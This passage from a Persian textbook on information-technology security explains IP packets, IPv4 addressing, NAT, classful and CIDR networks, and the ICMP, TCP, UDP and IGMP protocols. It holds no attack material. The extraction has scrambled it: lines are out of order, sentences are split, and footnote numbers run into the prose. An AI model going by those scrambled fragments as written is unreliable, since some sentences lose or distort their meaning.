ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺼﻮﺭﺕ ﺑﻠﻮﻛﻬﺎﻳﻲ ﺍﺯ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﺑﻪ ﻧﺎﻡ datagramﻭ ﻳﺎ ﺑﻪ ﺯﺑﺎﻥ ﻋﺎﻣﻴﺎﻧﻪﺗﺮ "ﺑﺴﺘﻪ" ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ .ﻫﺮ ﺑﺴﺘﻪ ﻳﻚ
ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﻣﺘﺸﻜﻞ ﺍﺯ ﭼﻨﺪ ﺑﺎﻳﺖ ﺩﺍﺭﺩ ﻛﻪ ﺑﻪ ﺁﻥ "ﺳﺮﺁﻳﻨﺪ" ﻣﻲﮔﻮﻳﻨﺪ ﻭ ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ﺑﺴﺘﻪ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ .ﺑﺪﻧﺒﺎﻝ
ﻻ ﻳﻚ ﺑﻠﻮﻙ ﺑﺰﺭﮔﺘﺮ ﺍﺯ ﺑﺎﻳﺘﻬﺎ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻛﻪ "ﻣﺤﺘﻮﺍ"ﻱ ﺑﺴﺘﻪ ﻧﺎﻡ ﺩﺍﺭﺩ .ﭘﺲ ﺍﺯ ﺁﻧﻜﻪ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﻣﻲﺭﺳﻨﺪ، ﺳﺮﺁﻳﻨﺪ ﻣﻌﻤﻮ ﹰ
٢٧٢
ﻏﺎﻟﺒﹰﺎ ﺩﺭ ﻳﻚ ﺭﺷﺘﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﺑﺼﻮﺭﺕ ﭘﺸﺖﺳﺮﻫﻢ ﮔﺮﺩﻫﻢﺁﻭﺭﻱ ﻣﺠﺪﺩ ﻣﻲﺷﻮﻧﺪ؛ ﻭ ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻗﻄﻌﻪﻗﻄﻌﻪ ﺷﺪﻥ ﻭ ﮔﺮﺩﻫﻢﺁﻭﺭﻱ
ﻻ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺎ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﻣﺴﻴﺮﻫﺎﻱ ﻻ ﺍﺯ ﺩﻳﺪ ﻛﺎﺭﺑﺮ ﭘﻨﻬﺎﻥ ﺍﺳﺖ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻣﺠﺪﺩ ﺩﺍﺩﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﻣﺘﻔﺎﻭﺕ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻫﺮ ﺑﺴﺘﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻣﺒﺪﺍﺀ ﺗﺎ ﻣﻘﺼﺪ ﻣﺴﻴﺮ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﻃﻲ ﻛﻨﺪ.
ﺧﻮﺩ ﺑﺴﺘﻪﻫﺎﻱ IPﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﻳﺮ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷﺒﻜﻪ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ
IPﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺑﺎ ﺧﻄﻮﻁ ﻣﺴﺘﻘﻴﻢ ﺍﺳﺘﻴﺠﺎﺭﻱ ﺳﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﺴﺘﻪﻫﺎﻱ IPﺭﺍ ﺑﺼﻮﺭﺕ ﺟﺎﺳﺎﺯﻱﺷﺪﻩ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ
Frame Relayﻳﺎ ﺣﺎﻟﺖ ﺍﻧﺘﻘﺎﻝ ﻧﺎﻫﻤﮕﺎﻡ ) ٢٧٣(ATMﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ.
ﺁﺩﺭﺱﺩﻫﻲ IP
ﺑﻪ ﺗﻤﺎﻡ ﻭﺍﺳﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ IPv4ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻳﻚ ﺁﺩﺭﺱ ٣٢ﺑﻴﺘﻲ ﻳﻜﺘﺎ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﻣﻌﻤﻮ ﹰ
ﻻ
ﺑﺼﻮﺭﺕ ٤ﻋﺪﺩ ٨ﺑﻴﺘﻲ ﻛﻪ octetﻧﺎﻡ ﺩﺍﺭﻧﺪ ﺑﻴﺎﻥ ﻣﻲﺷﻮﻧﺪ .ﻳﻚ ﻧﻤﻮﻧﺔ ﺁﺩﺭﺱ 18.70.0.224 ،ﺍﺳﺖ .ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭼﻨﺪﻳﻦ
ﻭﺍﺳﻂ ﺷﺒﻜﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﺁﺩﺭﺱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ ،ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮﻳﻚ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻣﺘﻔﺎﻭﺕ ﺍﺯ
ﺩﻳﮕﺮﻱ ﺑﺎﺷﻨﺪ.
ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ،ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ ٣٢ﺑﻴﺘﻲ ﺩﺭ ﺁﻥ ﻭﺍﺣﺪ ﺍﺟﺎﺯﺓ ﺍﺗﺼﺎﻝ ﺣﺪﺍﻛﺜﺮ ٢٣٢ = ٤،٢٩٤،٩٦٧،٢٩٦ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ
ﻣﻲﺩﻫﺪ؛ ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺗﻌﺪﺍﺩ ﻛﻞ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﻧﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ٢٣٢ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﭼﻮﻥ proxyﻫﺎ ﻭ NATﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ IPﻣﺸﺘﺮﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﻛﻪ
ﭘﺸﺖ ﻳﻚ ﺁﺩﺭﺱ IPﻭﺍﺣﺪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺤﻮﺓ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﻳﻜﺪﻳﮕﺮ
ﺍﺯ ﺟﻤﻠﻪ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ،ﺑﺮﻗﺮﺍﺭﻱ ﺩﺳﺘﺮﺳﻲ ﻣﺤﺪﻭﺩ ،ﻭ ﻳﺎ ﺑﺮﻗﺮﺍﺭﻱ ﺩﺳﺘﺮﺳﻲ ﻧﺎﻣﺤﺪﻭﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻳﺎ ﻫﺮ ﺩﻭ ﺟﻬﺖ ﺍﺭﺗﺒﺎﻁ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ.
ﺷﺒﻜﻪﻫﺎﻱ IP
ﺍﻳﻨﺘﺮﻧﺖ ،ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺍﺳﺖ .ﻫﺮﭼﻨﺪ ﻣﺮﺩﻡ ﺯﻳﺎﺩﻱ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ ﻫﻤﮕﻲ ﺑﻪ ﺑﺰﺭﮔﻲ ﺷﺒﻜﺔ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮔﻲ ﻫﻤﭽﻮﻥ
WorldCom ،AT&Tﻭ Sprintﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﻴﺸﺘﺮ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻧﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻫﺴﺘﻨﺪ،
ﻣﺜﻞ ﺷﺒﻜﺔ ﺩﺭﻭﻥ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺩﺍﺭﻱ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻭ ﻳﺎ ﺷﺒﻜﺔ ﻳﻚ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﻛﻮﭼﻚ ﺗﺤﻘﻴﻘﺎﺗﻲ .ﺑﻪ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎﻱ ﻛﻮﭼﻚ
ﺷﻤﺎﺭﺓ ﺷﺒﻜﺔ ﻣﺨﺼﻮﺻﻲ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﻪ ﺩﻭ ﻃﺮﻳﻖ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪ ﻧﮕﺎﻩ ﻛﺮﺩ .ﺷﻤﺎﺭﻩ ﺷﺒﻜﻪﻫﺎﻱ "ﻛﻼﺳﻴﻚ" ﺑﺎ ﭼﻨﺪ ﺑﻴﺖ ﭘﻴﺸﻮﻧﺪ ﺩﺭ ﺁﺩﺭﺱ ﻫﺮ ﻣﻴﺰﺑﺎﻥ ﺩﺭ ﺷﺒﻜﻪ
ﻣﺸﺨﺺ ﻣﻲﺷﺪﻧﺪ .ﺍﻳﻦ ﺭﻭﺵ ﻓﻀﺎﻱ ﺁﺩﺭﺱﺩﻫﻲ ﺭﺍ ﺑﻪ ﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺧﻮﺵﺗﻌﺮﻳﻔﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺩﺭ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺗﻘﺴﻴﻢ ﻣﻲﻛﺮﺩ.
ﺩﺭ ﺭﻭﺵ ﺁﺩﺭﺱﺩﻫﻲ ﻛﻼﺳﻴﻚ ٥ ،ﻧﻮﻉ ﺍﺻﻠﻲ ﺁﺩﺭﺱ IPﻭﺟﻮﺩ ﺩﺍﺭﺩ؛ ﭼﻨﺪ ﺑﻴﺖ ﺍﻭﻝ ﺁﺩﺭﺱ )ﺑﻴﺘﻬﺎﻱ ﺑﺎ ﺍﺭﺯﺵ ﺑﻴﺸﺘﺮ( ﻛﻼﺱ ﻳﺎ ﺩﺳﺘﻪﺑﻨﺪﻱ
ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﻛﻪ ﺁﺩﺭﺱ ﺑﻪ ﺁﻥ ﺗﻌﻠﻖ ﺩﺍﺭﺩ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﻣﺎﺑﻘﻲ ﺑﻴﺘﻬﺎ ﺑﻪ ﺩﻭ ﻗﺴﻤﺖ "ﺷﺒﻜﻪ" ﻭ "ﻣﻴﺰﺑﺎﻥ" ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﻧﺪ:
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻛﻼﺳﻬﺎﻱ ﺷﺒﻜﻪ ،ﺣﻔﺮﻩﻫﺎﻱ ﺑﺰﺭﮔﻲ -ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺁﺩﺭﺳﻬﺎ ﻛﻪ ﻫﻴﭽﮕﺎﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﺷﺪﻧﺪ -ﺩﺍﺷﺘﻨﺪ .ﺑﺎ ﺍﻓﺰﺍﻳﺶ
ﻲ
ﻧﺎﮔﻬﺎﻧﻲ ﺗﻌﺪﺍﺩ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ،ﻳﻚ ﺗﻌﺒﻴﺮ ﻧﺴﺒﺘﹰﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ﺷﺒﻜﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺷﺪ ﻛﻪ ﺩﺭ ﻧﺴﺒﺖ ﺩﺍﺩﻥ ﺁﺩﺭﺳﻬﺎ ﺍﺟﺎﺯﺓ ﻛﻮﭼﻜ ﹺ
ﺑﻴﺸﺘﺮ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻫﺪﺭ ﺭﻓﺘﻦ ﻛﻤﺘﺮ ﺁﺩﺭﺳﻬﺎ ﺭﺍ ﻣﻲﺩﺍﺩ .ﺍﻳﻦ ﺭﻭﺵ ،ﻣﺴﻴﺮﻳﺎﺑﻲ ﺑﺪﻭﻥ ﻃﺒﻘﻪﺑﻨﺪﻱ ﻣﻴﺎﻥ ﺩﺍﻣﻨﻪﻫﺎ ) ٢٧٧(CIDRﻧﺎﻡ ﺩﺍﺭﺩ.
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﺎﻡ ﺑﺮﻣﻲﺁﻳﺪ ،ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﭼﻴﺰﻱ ﺑﻪ ﻧﺎﻡ ﻛﻼﺱ ﺁﺩﺭﺱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﺑﺠﺎﻱ ﺁﻥ ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪﻫﺎ ﺑﻮﺳﻴﻠﺔ
ﺑﺎﺍﺭﺯﺷﺘﺮﻳﻦ kﺑﻴﺖ ﻫﺮ ﺁﺩﺭﺱ ﺗﻌﺮﻳﻒ ﻣﻲﺷﻮﺩ ،ﻭ ﻣﺎﺑﻘﻲ ﺑﻴﺘﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﺩﺭﺱ ﻛﻪ ﻣﻌﺮﻑ ﺷﻤﺎﺭﺓ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺖ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﺓ ﺳﺮﻭﻳﺲ ،ﻣﺤﺪﻭﺩﻩﺍﻱ ﺍﺯ ﺁﺩﺭﺳﻬﺎ ﺩﺍﺩ ﻛﻪ ١٤ﺑﻴﺖ ﺍﻭﻝ ﺁﻧﻬﺎ ﻳﻚ ﻣﻘﺪﺍﺭ ﺛﺎﺑﺖ )ﺁﺩﺭﺱ ﺷﺒﻜﻪ( ،ﻭ ١٨ﺑﻴﺖ
ﺑﺎﻗﻴﻤﺎﻧﺪﻩ ﻧﻤﺎﻳﺎﻧﮕﺮ ﻣﻘﺎﺩﻳﺮ ﻣﻮﺟﻮﺩ ﺑﺮﺍﻱ ﺍﻧﺘﺴﺎﺏ ﺑﻪ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺭﻭﺵ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﺓ ﺳﺮﻭﻳﺲ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ٢١٨ﺁﺩﺭﺱ
ﻣﺘﻤﺎﻳﺰ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺗﺨﺼﻴﺺ ﺩﻫﺪ.
ﻻ ﺑﺎ ﺑﻴﺎﻥ ﮐﻮﭼﮑﺘﺮﻳﻦ ﺁﺩﺭﺱ IPﻣﺤﺪﻭﺩﻩ ،ﻳﻚ ﻋﻼﻣﺖ ﻣﻤﻴﺰ ،ﻭ ﺳﭙﺲ ﺍﻧﺪﺍﺯﺓ ﻗﺴﻤﺖ ﺷﺒﻜﻪ ﺑﺮ ﺣﺴﺐ ﺑﻴﺖ ﺑﻪ
ﺷﺒﻜﻪﻫﺎﻱ CIDRﻣﻌﻤﻮ ﹰ
ﻼ ﺷﺒﻜﺔ 128.200.0.0/14ﻧﻤﺎﻳﺎﻧﮕﺮ ﺗﻤﺎﻡ ﺁﺩﺭﺳﻬﺎﻱ IPﺍﺯ 128.200.0.0ﺗﺎ 128.203.255.255ﺍﺳﺖ. ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﻨﺪ .ﻣﺜ ﹰ
٢٧٨
ﻳﻚ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺍﻳﻦ ﺷﺒﻜﻪ ﺑﻴﺎﻥ ﮐﻮﭼﮑﺘﺮﻳﻦ ﺁﺩﺭﺱ IPﻣﺤﺪﻭﺩﻩ ،ﻳﻚ ﻋﻼﻣﺖ ﻣﻤﻴﺰ ،ﻭ ﺳﭙﺲ netmaskﻣﻲﺑﺎﺷﺪ.
ﺑﻌﻨﻮﺍﻥ ﻧﻤﻮﻧﻪ ﺷﺒﻜﻪﺍﻱ ﻛﻪ ﺩﺭ ﻣﺜﺎﻝ ﻗﺒﻞ ﺁﻣﺪ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺑﺼﻮﺭﺕ 128.200.0.0/255.252.0.0ﺑﻴﺎﻥ ﻣﻲﺷﻮﺩ.
ﺭﻭﺵ CIDRﺑﺎ ﻗﺎﻟﺐ ﺁﺩﺭﺱﺩﻫﻲ ﻛﻼﺳﻴﻚ ﺳﺎﺯﮔﺎﺭ ﺍﺳﺖ :ﻗﺴﻤﺖ ﺷﺒﻜﺔ ﺁﺩﺭﺳﻬﺎﻱ ﻛﻼﺱ Aﺍﺯ ٨ﺑﻴﺖ ﺗﺸﻜﻴﻞ ﺷﺪﻩ )ﻣﺜ ﹰ
ﻼ
،(10.0.0.0/8ﻛﻼﺱ Bﺍﺯ ١٦ﺑﻴﺖ )ﻣﺜ ﹰﻼ (192.168.0.0/16ﻭ ﻣﺎﺑﻘﻲ ﻛﻼﺳﻬﺎﻱ ﺁﺩﺭﺱ ﻧﻴﺰ ﺑﻪ ﻫﻤﻴﻦ ﻣﻨﻮﺍﻝ.
۲۷۶ﺍﺷﻜﺎﻻﺕ ﻭ ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﻣﻴﺎﻥ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ،IPﺟﻠﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ۰ﻳﺎ ۲۵۵ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺁﺩﺭﺱ IPﻣﻌﺘﺒﺮ ﺭﺍ ﮔﺮﻓﺘﻪ ﺍﺳﺖ.
277 Classless Inter-Domain Routing
۲۷۸ﻳﻚ ﺷﻤﺎﺭﻩ ﻣﺸﺎﺑﻪ ﻳﻚ ﺁﺩﺭﺱ IPﻛﻪ ﺩﺭ ﺁﻥ kﺑﻴﺖ ﺑﺎ ﺍﺭﺯﺵ ﺑﻴﺸﺘﺮ ﻛﻪ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺷﻤﺎﺭﺓ ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ ﻣﻘﺪﺍﺭ ۱ﻭ ﻣﺎﺑﻘﻲ ﺑﻴﺘﻬﺎ ﻣﻘﺪﺍﺭ ۰ﺩﺍﺭﻧﺪ.
٣٩٥ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﺴﺘﻪﻫﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎ
ﺍﻣﺮﻭﺯﻩ ﭼﻬﺎﺭ ﻧﻮﻉ ﺍﺻﻠﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ IPﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻭ ﺗﻮﺳﻂ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺩﻳﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻫﺮ ﻧﻮﻉ
ﺑﺴﺘﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﺮﻭﺗﻜﻞ ﺧﺎﺻﻲ ﺍﺳﺖ) .ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺑﺴﺘﻪﻫﺎ ﺗﻮﺳﻂ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺭﻭﻱ ﺷﺎﻫﺮﺍﻩﻫﺎﻱ ﺍﺻﻠﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﻳﺎ VPNﻫﺎ ﺑﻜﺎﺭ ﺭﻭﻧﺪ(.
ICMP
٢٧٩
ﭘﺮﻭﺗﻜﻞ ﭘﻴﺎﻡ ﻛﻨﺘﺮﻟﻲ ﺍﻳﻨﺘﺮﻧﺖ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﭘﺮﻭﺗﻜﻞ - IPﻣﺜ ﹰ
ﻼ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺗﺮﺍﻓﻴﻚ ﻭ ﻣﺴﻴﺮﻳﺎﺑﻲ -
ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺯﻳﺮﻧﻮﻋﻬﺎﻱ ﺯﻳﺎﺩﻱ ﻧﻴﺰ ﺩﺍﺭﺩ.
TCP
٢٨٠
ﭘﺮﻭﺗﻜﻞ ﻛﻨﺘﺮﻝ ﺍﻧﺘﻘﺎﻝ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﺍﺗﺼﺎﻝ ﺩﻭﻃﺮﻓﺔ ﺟﺮﻳﺎﻧﻲ ﻣﻴﺎﻥ ﺩﻭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺍﺯ ﺑﺮﻗﺮﺍﺭﻱ
ﺍﺗﺼﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻧﺘﻘﺎﻝ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺍﻃﻼﻋﺎﺕ ،ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺗﻤﺎﻡ ﻭﻗﺖ ٢٨١ﻭ ﺍﻧﺘﻘﺎﻝ ﻣﺠﺪﺩ ٢٨٢ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ
ﻣﻲﮔﻴﺮﺩ.
UDP
٢٨٣
ﭘﺮﻭﺗﻜﻞ datagramﻛﺎﺭﺑﺮ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﺑﺴﺘﻪﻫﺎ ﺍﺯ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﻣﻴﺰﺑﺎﻥ ﺩﻳﮕﺮ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ
ﺑﺪﻭﻥ ﺍﺗﺼﺎﻝ ٢٨٤ﺍﺳﺖ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻣﺤﺴﻮﺏ ﻧﻤﻲﺷﻮﺩ ﻭ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﭘﻴﺎﻡ ﻣﻜﺎﻧﻴﺰﻡ ﺧﺎﺻﻲ
ﻧﺪﺍﺭﺩ ،ﺍﻣﺎ ﺩﺭ ﺷﺮﺍﻳﻂ ﻣﻌﻤﻮﻟﻲ ﺍﻛﺜﺮ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻣﻘﺼﺪ ﻣﻲﺭﺳﻨﺪ.
IGMP
٢٨٥
ﭘﺮﻭﺗﻜﻞ ﻣﺪﻳﺮﻳﺖ ﮔﺮﻭﻩ ﺍﻳﻨﺘﺮﻧﺖ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺩﺭ ﻛﻨﺘﺮﻝ multicastﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ ،ﻛﻪ ﻓﺮﺳﺘﺎﺩﻥ ﺗﻌﻤﺪﻱ ﻳﻚ ﺑﺴﺘﻪ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﻳﻚ
ﻣﻴﺰﺑﺎﻥ ﺍﺳﺖ Multicast .ﭘﺎﻳﻪ ﻭ ﺍﺳﺎﺱ ﺷﺎﻫﺮﺍﻩﻫﺎﻱ ﭼﻨﺪﺭﺳﺎﻧﻪﺍﻱ ﺍﻳﻨﺘﺮﻧﺖ - MBONE -ﻣﻲﺑﺎﺷﺪ.
ICMP
ﭘﺮﻭﺗﻜﻞ ﭘﻴﺎﻡ ﻛﻨﺘﺮﻟﻲ ﺍﻳﻨﺘﺮﻧﺖ .ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺩﺭ ﺗﺒﺎﺩﻝ ﭘﻴﺎﻣﻬﺎ ﻣﻴﺎﻥ ﺩﺭﻭﺍﺯﻩﻫﺎ ﻭ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ.
